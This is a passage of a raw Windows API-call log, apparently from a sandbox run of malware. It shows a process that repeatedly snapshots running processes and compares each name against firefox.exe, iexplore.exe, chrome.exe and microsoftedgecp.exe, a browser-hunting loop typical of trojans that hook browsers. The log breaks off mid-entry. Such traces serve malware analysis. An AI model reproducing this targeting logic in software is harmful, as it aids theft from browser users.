lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0184.453] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0184.453] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0184.453] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0184.454] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0184.454] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0184.454] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0184.454] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0184.454] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0184.455] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0184.455] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0184.455] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0184.455] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0184.455] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0184.455] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0184.455] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0184.455] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0184.456] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0184.456] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0184.456] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0184.456] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0184.456] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0184.456] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0184.456] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0184.456] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0184.457] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0184.457] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0184.457] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0184.457] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0184.457] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0184.457] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0184.457] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0184.457] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0184.458] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0184.458] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0184.458] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0184.458] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.458] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0184.458] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0184.459] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0184.459] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0184.459] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.459] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0184.459] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0184.459] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0184.459] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.460] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.460] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.460] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.460] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.460] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0184.460] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0184.460] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0184.460] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0184.460] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.460] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.461] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.461] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.461] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.461] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0184.461] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0184.461] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0184.461] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0184.461] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.462] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.462] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.462] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.462] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.462] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.462] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.462] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.463] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.463] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.463] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0184.488] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0184.488] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0184.488] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0184.488] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.488] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.488] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0184.488] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0184.488] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0184.488] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.488] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.489] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.489] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.489] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.489] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.489] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.489] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.489] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.489] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.489] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.489] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.490] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.490] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.490] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.490] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.490] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.490] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0184.490] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0184.490] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0184.490] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.490] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0184.491] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0184.491] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0184.491] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0184.491] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0184.491] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0184.492] CloseHandle (hObject=0xd4) returned 1 [0184.492] Sleep (dwMilliseconds=0x3e8) [0185.503] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0185.505] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0185.505] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0185.505] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0185.505] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0185.505] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0185.505] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0185.506] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0185.506] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0185.506] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0185.506] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0185.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0185.506] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0185.506] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0185.506] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0185.506] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.507] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0185.507] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0185.507] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0185.507] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0185.507] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0185.507] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0185.507] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0185.507] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0185.508] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0185.508] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0185.508] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0185.508] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0185.509] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0185.509] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0185.509] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0185.509] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0185.509] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0185.509] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0185.509] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0185.509] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0185.510] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0185.510] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0185.510] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0185.510] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0185.511] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0185.511] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0185.511] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0185.511] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.511] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.511] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.511] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.511] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.512] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.512] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.512] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.512] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.512] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.512] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.512] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.512] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.512] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.512] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.513] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.513] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.513] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.513] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.513] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.513] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.513] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.513] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0185.514] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0185.514] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0185.514] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0185.514] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.514] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, 